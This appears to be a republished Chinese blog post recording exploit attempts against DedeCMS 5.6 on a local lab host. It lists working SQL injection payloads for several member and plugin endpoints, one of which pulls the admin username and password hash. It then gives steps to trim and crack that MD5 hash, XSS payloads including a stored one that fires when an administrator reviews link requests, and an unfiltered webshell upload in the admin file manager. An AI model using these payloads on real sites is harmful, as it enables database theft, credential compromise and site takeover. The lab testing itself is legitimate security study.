dedecms5.6漏洞嘗試


0x00 SQL注入漏洞

SQL注入漏洞1

注入點:http://192.168.1.130/member/buy_action.php?product=
完整payload:

http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select database()),(select 1),'4

訪問http://192.168.1.130/member/operation.php 查詢出信息
當前數據庫信息dedecmsv56gbk

http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select table_name from information_schema.tables where table_schema=database() LIMIT 7,1),(select 1),'4

查出表名 dede_admin

http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select column_name from information_schema.columns where table_name=0x646564655f61646d696e LIMIT 6,1),(select 1),'4

圖片1 sql注入漏洞1

SQL注入漏洞2

注入點:http://192.168.1.130/member/mystow.php?type=book'
Payload:http://192.168.1.130/member/mystow.php?type=book' union select 1,2,3,database(),5,6,7,8,9%23

圖片2 sql注入漏洞2
####SQL注入漏洞3 參考鏈接http://wooyun.tangscan.cn/static/bugs/wooyun-2014-063441.html 注冊用戶在筆名中添加如下字符 ``` ',char(@`'`),0,0,database(),0,0)# ``` 然后添加一個好友 觸發數據庫查詢,再回到我的織夢中即可看到查詢出的數據 ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114207416-1990673892.png)
圖片3 sql注入漏洞3
####SQL注入漏洞4 參考鏈接:http://wooyun.tangscan.cn/static/bugs/wooyun-2014-052214.html 注入點: `http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=` 漏洞利用payload ``` http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 ``` ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114220979-528169713.png)
圖片4 sql注入漏洞4
如果是32位MD5減去頭5位,減去尾七位 如果是20位MD5密碼,前減3后減1,得到16位MD5 將得到的23a7bbd73250516f069d處理后得到7bbd73250516f069,放到cmd5解密得到admin的密碼為admin123

0x01 Xss漏洞

Xss漏洞1:

完整payload:
http://192.168.1.130/plus/recommend.php?aid=1&action=sendmail&title=%3Cscript%3Ealert%281%29%3C/script%3E
漏洞證明:

圖片5 xss漏洞1
####XSS漏洞2 參考鏈接: http://wooyun.tangscan.cn/static/bugs/wooyun-2014-065561.html 普通用戶申請友情鏈接,在網站logo處添加 ``` '" onerror=alert(1);// ``` ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114330916-1469584272.png)
圖片6 xss漏洞2填寫信息
觸發條件:后台管理員登陸查看友情鏈接申請觸發xss 漏洞證明: ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114341135-764123419.png)
圖片7 xss漏洞2觸發證明

0x02文件上傳漏洞

1,在后台頁面文件式管理處,點擊上傳文件,直接上傳木馬,沒有過濾。

圖片8 文件上傳漏洞點


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM